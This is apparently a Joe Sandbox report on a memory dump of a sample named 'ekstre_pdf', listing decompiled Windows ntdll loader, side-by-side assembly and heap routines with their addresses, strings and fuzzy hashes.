0x3407b1d5
0x3407b1d9
0x3407b1dc
0x3407b303
0x3407b30a
0x340c81f8
0x340c81fa
0x340c81ff
0x340c8201
0x340c8201
0x340c8206
0x340c8207
0x340c821f
0x340c8224
0x340c8227
0x340c8227
0x3407b312
0x3407b317
0x3407b31b
0x3407b31d
0x3407b3ff
0x3407b3ff
0x3407b323
0x3407b325
0x3407b264
0x3407b266
0x00000000
0x00000000
0x3407b272
0x3407b2f6
0x3407b2fb
0x3407b2fb
0x3407b278
0x3407b281
0x3407b285
0x3407b2a0
0x3407b2ac
0x00000000
0x3407b287
0x3407b287
0x3407b287
0x3407b28d
0x00000000
0x00000000
0x3407b292
0x3407b299
0x3407b29e
0x00000000
0x00000000
0x3407b29e
0x00000000
0x3407b292
0x3407b2b3
0x3407b2b9
0x3407b2bb
0x3407b2bd
0x3407b2ca
0x3407b2ca
0x3407b2cc
0x3407b2d0
0x3407b2d2
0x00000000
0x00000000
0x00000000
0x3407b2d2
0x3407b2c0
0x3407b2c0
0x3407b2c4
0x00000000
0x00000000
0x340c82bf
0x340c82c2
0x340c82c5
0x340c82c7
0x00000000
0x00000000
0x00000000
0x340c82cd
0x00000000
0x3407b2c0
0x3407b285
0x3407b1e5
0x3407b1eb
0x3407b1ef
0x3407b210
0x3407b210
0x3407b213
0x3407b215
0x3407b21b
0x3407b262
0x3407b262
0x00000000
0x3407b262
0x3407b225
0x3407b22d
0x340c823f
0x340c8245
0x340c8251
0x340c8254
0x340c8257
0x340c825d
0x340c825f
0x340c825f
0x340c8264
0x340c8267
0x340c826a
0x340c826c
0x340c827f
0x340c8281
0x340c8284
0x340c8286
0x00000000
0x00000000
0x340c8288
0x340c828b
0x340c828e
0x340c8295
0x340c829a
0x340c829d
0x340c829d
0x00000000
0x340c826e
0x340c8275
0x340c82a0
0x340c82a0
0x340c82a2
0x340c82b0
0x340c82b0
0x3407b25f
0x3407b25f
0x00000000
0x3407b25f
0x340c82a4
0x340c82a7
0x00000000
0x340c82a7
0x340c826c
0x340c8247
0x00000000
0x340c8247
0x3407b233
0x3407b236
0x3407b243
0x3407b24b
0x3407b24e
0x3407b25b
0x00000000
0x00000000
0x00000000
0x00000000
0x3407b1f1
0x3407b1f1
0x3407b1f1
0x3407b1f7
0x00000000
0x00000000
0x3407b206
0x3407b20b
0x00000000
0x00000000
0x3407b20d
0x00000000
0x3407b20d
0x3407b3ae
0x3407b3b1
0x340c8238
0x00000000
0x340c8238
0x3407b3bb
0x3407b3c0
0x3407b3c3
0x3407b3c5
0x3407b3c7
0x3407b3c9
0x00000000
0x00000000
0x3407b3cf
0x00000000
0x3407b10f
0x3407b117
0x3407b123
0x3407b129
0x3407b12d
0x3407b144
0x3407b154
0x3407b160
0x3407b32d
0x3407b32d
0x3407b332
0x340c81e4
0x3407b338
0x3407b338
0x3407b338
0x3407b332
0x3407b16a
0x3407b173
0x3407b342
0x3407b347
0x340c81ee
0x00000000
0x340c81ee
0x3407b34f
0x3407b35c
0x3407b366
0x3407b372
0x3407b381
0x3407b383
0x3407b385
0x00000000
0x00000000
0x3407b38e
0x3407b391
0x3407b393
0x3407b39e
0x3407b39e
0x3407b39e
0x3407b3a0
0x3407b3a0
0x00000000
0x3407b3a0
0x3407b395
0x3407b39c
0x3407b406
0x00000000
0x3407b406
0x00000000
0x3407b179
0x3407b179
0x3407b179
0x3407b17c
0x3407b17e
0x3407b180
0x340c82d2
0x340c82d2
0x340c82d9
0x340c82db
0x340c82f3
0x340c82f8
0x340c82fb
0x340c8302
0x340c8308
0x340c8308
0x3407b2d8
0x3407b2dc
0x3407b2e5
0x3407b2e5
0x3407b2f2
0x3407b186
0x3407b188
0x3407b1ae
0x3407b1b2
0x3407b3dc
0x3407b3e3
0x3407b3eb
0x3407b3eb
0x3407b1be
0x3407b3f5
0x3407b3f5
0x3407b1c4
0x3407b1c4
0x3407b1c7
0x3407b1c9
0x00000000
0x3407b1cf
0x3407b1cf
0x3407b1d2
0x00000000
0x3407b1d2
0x3407b1c9
0x3407b180
0x3407b173

Strings

API set, xrefs: 340C8201, 340C8206
LdrpPreprocessDllName, xrefs: 340C8210, 340C82E4
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 340C82DD
DLL %wZ was redirected to %wZ by %s, xrefs: 340C8209
minkernel\ntdll\ldrutil.c, xrefs: 340C821A, 340C82EE
SxS, xrefs: 340C81FA

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: bd73beb63d6ac0f4ed0aa6812681153c7f008bf64fdb9a9cb2f53a82eecd50d5
Instruction ID: 44a0e482e8b7e4279cd68ba46dd49cac0b9551996e2d176d5edc6e0a1c1ddee3
Opcode Fuzzy Hash: bd73beb63d6ac0f4ed0aa6812681153c7f008bf64fdb9a9cb2f53a82eecd50d5
Instruction Fuzzy Hash: EAC12175B05315EFEB148B64C890BBEBFB5AF45348F5080E9E901AB290EB74DC45C39A

Uniqueness

Uniqueness Score: -1.00%

Function 34092594 Relevance: 7.6, Strings: 6, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E34092594(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr _a16) {
				void* _v8;
				void* _v12;
				char _v16;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr* _t34;
				signed int _t35;
				void* _t38;
				signed int _t41;
				void* _t43;

				_t38 = __edx;
				_t35 = __ecx;
				_t21 =  *[fs:0x30];
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				if(__edx == 0x3403120c) {
					E340EEF10(0x33, 0, "SXS: %s() passed the empty activation context\n", "RtlGetAssemblyStorageRoot");
					goto L23;
				} else {
					_t34 = _a8;
					if(_t34 != 0) {
						 *_t34 = 0;
					}
					_t41 = _a4;
					if((_t35 & 0xfffffffc) != 0 || _t41 < 1 || _t34 == 0) {
						_push(E34092C10);
						_push(_t34);
						_push(_t41);
						_push(_t35);
						E340EEF10(0x33, 0, "SXS: %s() bad parameters:\nSXS:    Flags              : 0x%lx\nSXS:    AssemblyRosterIndex: 0x%lx\nSXS:    AssemblyStorageRoot: %p\nSXS:    Callback           : %p\n", "RtlGetAssemblyStorageRoot");
						goto L23;
					} else {
						_t43 = E3409265C(_t35 & 0x00000003, _t21, _t38,  &_v12,  &_v8,  &_v16);
						if(_t43 < 0) {
							_push(_t43);
							_push("SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header.  Status = 0x%08lx\n");
							goto L20;
						} else {
							_t40 = _v12;
							if(_v12 == 0) {
								L14:
								_t43 = 0;
							} else {
								_t27 = _v16;
								if(_t27 == 0) {
									L16:
									_t43 = 0xc00000e5;
								} else {
									_t37 = _v8;
									if(_v8 == 0) {
										goto L16;
									} else {
										if(_t41 >=  *((intOrPtr*)(_t27 + 8))) {
											_push( *((intOrPtr*)(_t27 + 8)));
											_push(_t41);
											E340EEF10(0x33, 0, "SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx\n", "RtlGetAssemblyStorageRoot");
											L23:
											_t43 = 0xc000000d;
										} else {
											_t43 = E34092919(_t37, _t40, _t41, _t37, _a16);
											if(_t43 < 0) {
												_push(_t43);
												_push("SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry.  Status = 0x%08lx\n");
												L20:
												_push(0);
												_push(0x33);
												E340EEF10();
											} else {
												_t32 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + _t41 * 4));
												if(_t32 == 0) {
													goto L16;
												} else {
													 *_t34 = _t32 + 4;
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t43;
			}

0x34092594
0x34092594
0x3409259c
0x340925a6
0x340925a9
0x340925ac
0x340925b6
0x340d1f77
0x00000000
0x340925bc
0x340925bc
0x340925c1
0x340925c3
0x340925c3
0x340925c5
0x340925ce
0x340d1fbc
0x340d1fc1
0x340d1fc2
0x340d1fc3
0x340d1fd1
0x00000000
0x340925e5
0x340925fc
0x34092600
0x340d1f81
0x340d1f82
0x00000000
0x34092606
0x34092606
0x3409260b
0x3409264a
0x3409264a
0x3409260d
0x3409260d
0x34092612
0x34092655
0x34092655
0x34092614
0x34092614
0x34092619
0x00000000
0x3409261b
0x3409261e
0x340d1fa0
0x340d1fa3
0x340d1fb2
0x340d1fd9
0x340d1fd9
0x34092624
0x3409262e
0x34092632
0x340d1f89
0x340d1f8a
0x340d1f8f
0x340d1f8f
0x340d1f91
0x340d1f93
0x34092638
0x3409263e
0x34092643
0x00000000
0x34092645
0x34092648
0x00000000
0x34092648
0x34092643
0x34092632
0x3409261e
0x34092619
0x34092612
0x3409260b
0x34092600
0x340925ce
0x34092652

Strings

RtlGetAssemblyStorageRoot, xrefs: 340D1F6A, 340D1FA4, 340D1FC4
SXS: %s() passed the empty activation context, xrefs: 340D1F6F
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 340D1F8A
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 340D1FC9
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 340D1F82
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 340D1FA9

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 06f80b5a69d7eb34f80cd6fa2693825d1c3a6b1db734d3d17421feca092b0275
Instruction ID: 3036f59491cf58d1197a823d71df0b1f3f851468f1d1a5199fc5e41ad90f11c3
Opcode Fuzzy Hash: 06f80b5a69d7eb34f80cd6fa2693825d1c3a6b1db734d3d17421feca092b0275
Instruction Fuzzy Hash: 4231C5B6B01314BFF7148A96DC40F9B7AA8AB45694F0148EDB9007B255DB30AE04EEE1

Uniqueness

Uniqueness Score: -1.00%

Function 3409C5C6 Relevance: 7.6, Strings: 6, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E3409C5C6() {
				signed int _v8;
				signed int _v24;
				char _v92;
				char _v96;
				char _v97;
				intOrPtr _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				signed char _t52;
				void* _t58;
				intOrPtr _t65;
				intOrPtr* _t72;
				void* _t73;
				signed int _t75;
				void* _t76;
				signed int _t77;
				signed int _t79;

				_t79 = (_t77 & 0xfffffff8) - 0x64;
				_v8 =  *0x3415b370 ^ _t79;
				_t72 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x2a4;
				_t75 = 0;
				if( *_t72 != 0) {
					__eflags =  *0x341537c0 & 0x00000005;
					if(( *0x341537c0 & 0x00000005) != 0) {
						E340DE692("minkernel\\ntdll\\ldrredirect.c", 0x23c, "LdrpInitializeImportRedirection", 2, "Loading import redirection DLL: \'%wZ\'\n", _t72);
						_t79 = _t79 + 0x18;
					}
					E340A8F40( &_v92, 0, 0x50);
					_t79 = _t79 + 0xc;
					_t68 =  &_v92;
					_t59 = _t72;
					_t75 = E34056B45(_t72,  &_v92, 0x1000001,  &_v96);
					__eflags = _v24;
					if(_v24 != 0) {
						E3408E7E0(_t59, _v92);
					}
					__eflags = _t75;
					if(__eflags >= 0) {
						_t75 = E340E4348(_v96, __eflags);
						__eflags = _t75;
						if(_t75 >= 0) {
							E340819DF(0);
							E34082755(_t68);
							_v97 = 0;
							_t65 =  *((intOrPtr*)(_v96 + 0x50));
							_t42 = E34081934(_t65, 0,  &_v97);
							_push(_t65);
							_t75 = _t42;
							_push(_t75);
							_t68 = 2;
							E3408270D(_t68);
							E340979F9();
							__eflags = _t75;
							if(_t75 >= 0) {
								 *( *((intOrPtr*)(_v100 + 0x50)) + 0xc) =  *( *((intOrPtr*)(_v100 + 0x50)) + 0xc) | 0xffffffff;
								 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x50)))) - 0x1c)) = 0xffff;
								E340E05C6(_v100, _t68);
								 *0x34155c9c = _v100;
							}
						} else {
							_t52 =  *0x341537c0; // 0x0
							__eflags = _t52 & 0x00000003;
							if((_t52 & 0x00000003) != 0) {
								E340DE692("minkernel\\ntdll\\ldrredirect.c", 0x257, "LdrpInitializeImportRedirection", 0, "Unable to build import redirection Table, Status = 0x%x\n", _t75);
								_t52 =  *0x341537c0; // 0x0
								_t79 = _t79 + 0x18;
							}
							__eflags = _t52 & 0x00000010;
							if((_t52 & 0x00000010) != 0) {
								asm("int3");
							}
						}
					}
				}
				_pop(_t73);
				_pop(_t76);
				_pop(_t58);
				return E340A4B50(_t75, _t58, _v8 ^ _t79, _t68, _t73, _t76);
			}

0x3409c5ce
0x3409c5d8
0x3409c5ea
0x3409c5f0
0x3409c5f5
0x340d7f71
0x340d7f78
0x340d7f91
0x340d7f96
0x340d7f96
0x340d7fa1
0x340d7fa6
0x340d7fad
0x340d7fb1
0x340d7fbe
0x340d7fc0
0x340d7fc4
0x340d7fca
0x340d7fca
0x340d7fcf
0x340d7fd1
0x340d7fe0
0x340d7fe2
0x340d7fe4
0x340d8022
0x340d8027
0x340d8037
0x340d803b
0x340d803e
0x340d8043
0x340d8044
0x340d8046
0x340d8049
0x340d804a
0x340d804f
0x340d8054
0x340d8056
0x340d8068
0x340d8075
0x340d807d
0x340d8086
0x340d8086
0x340d7fe6
0x340d7fe6
0x340d7feb
0x340d7fed
0x340d8005
0x340d800a
0x340d800f
0x340d800f
0x340d8012
0x340d8014
0x340d801a
0x340d801a
0x340d8014
0x340d7fe4
0x340d7fd1
0x3409c601
0x3409c602
0x3409c603
0x3409c60e

Strings

LdrpInitializeProcess, xrefs: 3409C5E4
LdrpInitializeImportRedirection, xrefs: 340D7F82, 340D7FF6
minkernel\ntdll\ldrredirect.c, xrefs: 340D7F8C, 340D8000
Loading import redirection DLL: '%wZ', xrefs: 340D7F7B
Unable to build import redirection Table, Status = 0x%x, xrefs: 340D7FF0
minkernel\ntdll\ldrinit.c, xrefs: 3409C5E3

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 4d3299263dd2a434c1d05963a56651f4f14cf7d1d28545b9ad64ca3477c1be7b
Instruction ID: c740334a56fdbf3a0667eeec26af64f5ff8a4a076c80c2d93005ced11fb6106d
Opcode Fuzzy Hash: 4d3299263dd2a434c1d05963a56651f4f14cf7d1d28545b9ad64ca3477c1be7b
Instruction Fuzzy Hash: 9831B175B047459FE214EF28DA45E6ABBD4EF85B14F0045ECF884AB3A1D620DC098FA2

Uniqueness

Uniqueness Score: -1.00%

Function 34070680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E34070680(intOrPtr __ecx, signed int* __edx) {
				signed int* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr* _v24;
				signed int _v28;
				signed int _v32;
				signed char _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t136;
				signed int _t141;
				void* _t143;
				signed int* _t145;
				signed int* _t146;
				intOrPtr _t148;
				unsigned int _t150;
				char _t162;
				signed int* _t164;
				signed char* _t165;
				intOrPtr _t166;
				signed int* _t168;
				signed char* _t169;
				signed char* _t171;
				signed char* _t180;
				intOrPtr _t195;
				signed int _t197;
				signed int _t209;
				signed char _t210;
				intOrPtr* _t215;
				intOrPtr _t222;
				signed int _t232;
				intOrPtr* _t242;
				intOrPtr _t244;
				unsigned int _t245;
				intOrPtr _t247;
				intOrPtr* _t258;
				signed char _t264;
				unsigned int _t269;
				intOrPtr _t271;
				signed int* _t276;
				signed int _t277;
				void* _t278;
				intOrPtr _t281;
				signed int* _t287;
				intOrPtr _t288;
				unsigned int _t291;
				unsigned int* _t295;
				intOrPtr* _t298;
				intOrPtr _t300;

				_t231 = __edx;
				_v8 = __edx;
				_t300 = __ecx;
				_t298 = E34070ACE(__edx,  *__edx);
				if(_t298 == __ecx + 0x8c) {
					L45:
					return 0;
				}
				if( *0x34156960 >= 1) {
					__eflags =  *(_t298 + 0x14) -  *__edx;
					if(__eflags < 0) {
						_t222 =  *[fs:0x30];
						__eflags =  *(_t222 + 0xc);
						if( *(_t222 + 0xc) == 0) {
							_push("HEAP: ");
							E3405B910();
						} else {
							E3405B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E3405B910();
						__eflags =  *0x34155da8;
						if(__eflags == 0) {
							E3411FC95(_t231, 1, _t298, __eflags);
						}
					}
				}
				_t136 =  *((intOrPtr*)(_t298 - 2));
				_t4 = _t298 - 8; // -8
				_t232 = _t4;
				if(_t136 != 0) {
					_v12 = (_t232 & 0xffff0000) - ((_t136 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_v12 = _t300;
				}
				_v20 =  *((intOrPtr*)(_t298 + 0x10));
				_t141 =  *(_t300 + 0xcc) ^  *0x34156d48;
				_v28 = _t141;
				if(_t141 != 0) {
					 *0x341591e0(_t300,  &_v20, _v8);
					_t143 = _v28();
					_t276 = _v8;
					goto L13;
				} else {
					_t295 = _v8;
					if( *(_t298 + 0x14) -  *_t295 <=  *(_t300 + 0x6c) << 3) {
						_t269 =  *(_t298 + 0x14);
						__eflags = _t269 -  *(_t300 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t295 = _t269;
						}
					}
					if(( *(_t300 + 0x40) & 0x00040000) != 0) {
						_push(0);
						_push(0x1c);
						_v16 = 0x40;
						_push( &_v60);
						_push(3);
						_push(_t300);
						_push(0xffffffff);
						_t209 = E340A2BE0();
						__eflags = _t209;
						_t210 = _v56;
						if(_t209 < 0) {
							L61:
							__eflags = 0;
							E34125FED(0, _t300, "true", _t210, 0, 0);
							_v16 = 4;
							L62:
							_t276 = _v8;
							goto L8;
						}
						__eflags = _t210 & 0x00000060;
						if((_t210 & 0x00000060) == 0) {
							goto L61;
						}
						__eflags = _v60 - _t300;
						if(__eflags == 0) {
							goto L62;
						}
						goto L61;
					} else {
						_v16 = 4;
						L8:
						_v32 =  *_t276;
						_v28 =  *((intOrPtr*)(_t300 + 0x1f8)) -  *((intOrPtr*)(_t300 + 0x244));
						_t215 = _t300 + 0xd4;
						_v24 = _t215;
						if( *0x3415373c != 0) {
							L11:
							_push(_v16);
							_push("true");
							_push(_t276);
							_push(0);
							_push( &_v20);
							_push(0xffffffff);
							_t143 = E340A2B10();
							_t276 = _v8;
							L12:
							 *((intOrPtr*)(_t300 + 0x21c)) =  *((intOrPtr*)(_t300 + 0x21c)) + 1;
							L13:
							if(_t143 < 0) {
								 *((intOrPtr*)(_t300 + 0x224)) =  *((intOrPtr*)(_t300 + 0x224)) + 1;
								goto L45;
							}
							_t145 =  *( *[fs:0x30] + 0x50);
							if(_t145 != 0) {
								__eflags =  *_t145;
								if(__eflags == 0) {
									goto L15;
								}
								_t146 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
								L16:
								if( *_t146 != 0) {
									__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
									if(__eflags != 0) {
										E3411EFD3(_t232, _t300, _v20,  *_t276, 2);
									}
								}
								if( *((intOrPtr*)(_t300 + 0x4c)) != 0) {
									_t291 =  *(_t300 + 0x50) ^  *_t232;
									 *_t232 = _t291;
									_t264 = _t291 >> 0x00000010 ^ _t291 >> 0x00000008 ^ _t291;
									if(_t291 >> 0x18 != _t264) {
										_push(_t264);
										E3411D646(_t232, _t300, _t232, _t298, _t300, __eflags);
									}
								}
								 *((char*)(_t232 + 2)) = 0;
								 *((char*)(_t232 + 7)) = 0;
								_t148 =  *((intOrPtr*)(_t298 + 8));
								_t242 =  *((intOrPtr*)(_t298 + 0xc));
								_t277 =  *((intOrPtr*)(_t148 + 4));
								_v32 = _t277;
								_t38 = _t298 + 8; // 0x8
								_t278 = _t38;
								if( *_t242 != _t277 ||  *_t242 != _t278) {
									E34125FED(0xd, 0, _t278, _v32,  *_t242, 0);
								} else {
									 *_t242 = _t148;
									 *((intOrPtr*)(_t148 + 4)) = _t242;
								}
								_t150 =  *(_t298 + 0x14);
								if(_t150 == 0) {
									L27:
									_t244 = _v12;
									 *((intOrPtr*)(_t244 + 0x30)) =  *((intOrPtr*)(_t244 + 0x30)) - 1;
									 *((intOrPtr*)(_t244 + 0x2c)) =  *((intOrPtr*)(_t244 + 0x2c)) - ( *(_t298 + 0x14) >> 0xc);
									 *((intOrPtr*)(_t300 + 0x1f8)) =  *((intOrPtr*)(_t300 + 0x1f8)) +  *(_t298 + 0x14);
									 *((intOrPtr*)(_t300 + 0x20c)) =  *((intOrPtr*)(_t300 + 0x20c)) + 1;
									 *((intOrPtr*)(_t300 + 0x208)) =  *((intOrPtr*)(_t300 + 0x208)) - 1;
									_t245 =  *(_t298 + 0x14);
									if(_t245 >= 0x7f000) {
										 *((intOrPtr*)(_t300 + 0x1fc)) =  *((intOrPtr*)(_t300 + 0x1fc)) - _t245;
										_t245 =  *(_t298 + 0x14);
									}
									_t280 = _v8;
									_t154 =  *_v8;
									if(_t245 <=  *_v8) {
										_t281 = _v12;
										__eflags =  *((intOrPtr*)(_t298 + 0x10)) + _t245 -  *((intOrPtr*)(_t281 + 0x28));
										_t280 = _v8;
										if( *((intOrPtr*)(_t298 + 0x10)) + _t245 !=  *((intOrPtr*)(_t281 + 0x28))) {
											 *_t280 =  *_t280 + ( *_t232 & 0x0000ffff) * 8;
											goto L30;
										}
										_t154 =  *_t280;
										goto L29;
									} else {
										L29:
										E3407096B(_t300, _v12,  *((intOrPtr*)(_t298 + 0x10)) + 0xffffffe8 +  *_t280, _t245 - _t154, _t232, _t280);
										 *_v8 =  *_v8 << 3;
										L30:
										_t247 = _v12;
										 *((char*)(_t232 + 3)) = 0;
										_t282 =  *((intOrPtr*)(_t247 + 0x18));
										if( *((intOrPtr*)(_t247 + 0x18)) != _t247) {
											_t162 = (_t232 - _t247 >> 0x10) + 1;
											_v32 = _t162;
											__eflags = _t162 - 0xfe;
											if(_t162 >= 0xfe) {
												E34125FED(3, _t282, _t232, _t247, 0, 0);
												_t162 = _v32;
											}
										} else {
											_t162 = 0;
										}
										 *((char*)(_t232 + 6)) = _t162;
										_t164 =  *( *[fs:0x30] + 0x50);
										if(_t164 != 0) {
											__eflags =  *_t164;
											if( *_t164 == 0) {
												goto L33;
											}
											_t165 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
											L34:
											if( *_t165 != 0) {
												_t166 =  *[fs:0x30];
												__eflags =  *(_t166 + 0x240) & 0x00000001;
												if(( *(_t166 + 0x240) & 0x00000001) == 0) {
													goto L35;
												}
												__eflags = E34073C40();
												if(__eflags == 0) {
													_t180 = 0x7ffe0380;
												} else {
													_t180 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t299 = _v8;
												E3411F1C3(_t232, _t300, _t232, __eflags,  *_v8,  *(_t300 + 0x74) << 3,  *_t180 & 0x000000ff);
												L36:
												_t168 =  *( *[fs:0x30] + 0x50);
												if(_t168 != 0) {
													__eflags =  *_t168;
													if( *_t168 == 0) {
														goto L37;
													}
													_t169 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													L38:
													if( *_t169 != 0) {
														__eflags = E34073C40();
														if(__eflags == 0) {
															_t171 = 0x7ffe038a;
														} else {
															_t171 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
														}
														E3411F1C3(_t232, _t300, _t232, __eflags,  *_t299,  *(_t300 + 0x74) << 3,  *_t171 & 0x000000ff);
													}
													return _t232;
												}
												L37:
												_t169 = 0x7ffe038a;
												goto L38;
											}
											L35:
											_t299 = _v8;
											goto L36;
										}
										L33:
										_t165 = 0x7ffe0380;
										goto L34;
									}
								} else {
									_t287 =  *(_t300 + 0xb8);
									if(_t287 != 0) {
										_t256 = _t150 >> 0xc;
										__eflags = _t256 - _t287[1];
										if(_t256 < _t287[1]) {
											L79:
											E3407036A(_t300, _t287, 0, _t298, _t256, _t150);
											goto L24;
										} else {
											goto L75;
										}
										while(1) {
											L75:
											_t197 =  *_t287;
											__eflags = _t197;
											_v32 = _t197;
											_t150 =  *(_t298 + 0x14);
											if(_t197 == 0) {
												break;
											}
											_t287 = _v32;
											__eflags = _t256 - _t287[1];
											if(_t256 >= _t287[1]) {
												continue;
											}
											goto L79;
										}
										_t256 = _t287[1] - 1;
										__eflags = _t287[1] - 1;
										goto L79;
									}
									L24:
									_t258 =  *((intOrPtr*)(_t298 + 4));
									_t195 =  *_t298;
									_t288 =  *_t258;
									if(_t288 !=  *((intOrPtr*)(_t195 + 4)) || _t288 != _t298) {
										E34125FED(0xd, 0, _t298,  *((intOrPtr*)(_t195 + 4)), _t288, 0);
									} else {
										 *_t258 = _t195;
										 *((intOrPtr*)(_t195 + 4)) = _t258;
									}
									goto L27;
								}
							}
							L15:
							_t146 = 0x7ffe0380;
							goto L16;
						}
						_t271 =  *_t215;
						if(_t271 != 0) {
							L63:
							_t101 = _t298 - 8; // -8
							_t232 = _t101;
							__eflags = _v28 +  *_t276 - _t271;
							if(__eflags <= 0) {
								goto L11;
							}
							_t220 =  *(_v24 + 4);
							__eflags =  *(_v24 + 4);
							if(__eflags != 0) {
								E34125FED(0x15, _t300, 0, _t220, _v32, _v28);
								_t276 = _v8;
							}
							_t143 = 0xc000012d;
							goto L12;
						}
						_t271 =  *0x3415432c; // 0x0
						_v24 = 0x3415432c;
						if(_t271 != 0) {
							goto L63;
						}
						goto L11;
					}
				}
			}

0x34070689
0x3407068d
0x34070690
0x34070699
0x340706a3
0x34070929
0x00000000
0x34070929
0x340706b0
0x340c4e97
0x340c4e99
0x340c4e9f
0x340c4ea5
0x340c4ea9
0x340c4eca
0x340c4ecf
0x340c4eab
0x340c4ec0
0x340c4ec5
0x340c4ed7
0x340c4edc
0x340c4ee4
0x340c4eeb
0x340c4ef6
0x340c4ef6
0x340c4eeb
0x340c4e99
0x340706b6
0x340706b9
0x340706b9
0x340706be
0x34070921
0x340706c4
0x340706c4
0x340706c4
0x340706ca
0x340706d3
0x340706d9
0x340706dc
0x340c4f0a
0x340c4f10
0x340c4f13
0x00000000
0x340706e2
0x340706e2
0x340706f2
0x34070930
0x34070936
0x34070938
0x3407093e
0x3407093e
0x34070938
0x340706ff
0x340c4f1b
0x340c4f1d
0x340c4f22
0x340c4f29
0x340c4f2a
0x340c4f2c
0x340c4f2d
0x340c4f2f
0x340c4f34
0x340c4f36
0x340c4f39
0x340c4f44
0x340c4f4d
0x340c4f4f
0x340c4f54
0x340c4f5b
0x340c4f5b
0x00000000
0x340c4f5b
0x340c4f3b
0x340c4f3d
0x00000000
0x00000000
0x340c4f3f
0x340c4f42
0x00000000
0x00000000
0x00000000
0x34070705
0x34070705
0x3407070c
0x3407070e
0x34070724
0x34070727
0x3407072d
0x34070730
0x34070751
0x34070751
0x34070757
0x3407075c
0x3407075d
0x3407075f
0x34070760
0x34070762
0x34070767
0x3407076a
0x3407076a
0x34070770
0x34070772
0x340c4f9f
0x00000000
0x340c4f9f
0x3407077e
0x34070783
0x340c4faa
0x340c4fad
0x00000000
0x00000000
0x340c4fbc
0x3407078e
0x34070791
0x340c4fcc
0x340c4fd3
0x340c4fe2
0x340c4fe2
0x340c4fd3
0x3407079b
0x340707a0
0x340707a4
0x340707b0
0x340707b7
0x340c4fec
0x340c4ff1
0x340c4ff1
0x340707b7
0x340707bd
